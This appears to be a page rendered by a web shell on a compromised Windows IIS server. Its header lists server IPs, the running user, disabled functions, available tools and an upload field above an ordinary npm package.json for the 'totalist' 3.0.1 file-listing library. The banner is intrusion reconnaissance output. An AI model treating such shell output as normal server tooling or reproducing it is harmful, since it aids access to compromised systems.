| Server IP : 185.208.173.17 / Your IP : 87.236.161.98 Web Server : Microsoft-IIS/10.0 System : Windows NT SRV8576125506 10.0 build 26100 (Windows Server 2016) AMD64 User : IUSR ( 0) PHP Version : 7.4.13 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/inetpub/wwwroot/parsmega.nuxt/node_modules/totalist/ |
Upload File : |
{
"_args": [
[
"totalist@3.0.1",
"C:\\inetpub\\wwwroot\\parsmega.com"
]
],
"_from": "totalist@3.0.1",
"_id": "totalist@3.0.1",
"_inBundle": false,
"_integrity": "sha512-sf4i37nQ2LBx4m3wB74y+ubopq6W/dIzXg0FDGjsYnZHVa1Da8FH853wlL2gtUhg+xJXjfk3kUZS3BRoQeoQBQ==",
"_location": "/totalist",
"_phantomChildren": {},
"_requested": {
"type": "version",
"registry": true,
"raw": "totalist@3.0.1",
"name": "totalist",
"escapedName": "totalist",
"rawSpec": "3.0.1",
"saveSpec": null,
"fetchSpec": "3.0.1"
},
"_requiredBy": [
"/sirv"
],
"_resolved": "https://registry.npmjs.org/totalist/-/totalist-3.0.1.tgz",
"_spec": "3.0.1",
"_where": "C:\\inetpub\\wwwroot\\parsmega.com",
"author": {
"name": "Luke Edwards",
"email": "luke.edwards05@gmail.com",
"url": "https://lukeed.com"
},
"bugs": {
"url": "https://github.com/lukeed/totalist/issues"
},
"description": "A tiny (195B to 220B) utility to recursively list all (total) files in a directory",
"devDependencies": {
"bundt": "1.1.1",
"esm": "3.2.25",
"uvu": "0.3.3"
},
"engines": {
"node": ">=6"
},
"exports": {
".": {
"types": "./index.d.ts",
"import": "./dist/index.mjs",
"require": "./dist/index.js"
},
"./sync": {
"types": "./sync/index.d.ts",
"import": "./sync/index.mjs",
"require": "./sync/index.js"
}
},
"files": [
"index.d.ts",
"dist",
"sync"
],
"homepage": "https://github.com/lukeed/totalist#readme",
"keywords": [
"list",
"recursive",
"files",
"glob",
"tree"
],
"license": "MIT",
"main": "dist/index.js",
"modes": {
"sync": "src/sync.js",
"default": "src/async.js"
},
"module": "dist/index.mjs",
"name": "totalist",
"repository": {
"type": "git",
"url": "git+https://github.com/lukeed/totalist.git"
},
"scripts": {
"build": "bundt",
"test": "uvu -r esm test -i fixtures"
},
"types": "index.d.ts",
"version": "3.0.1"
}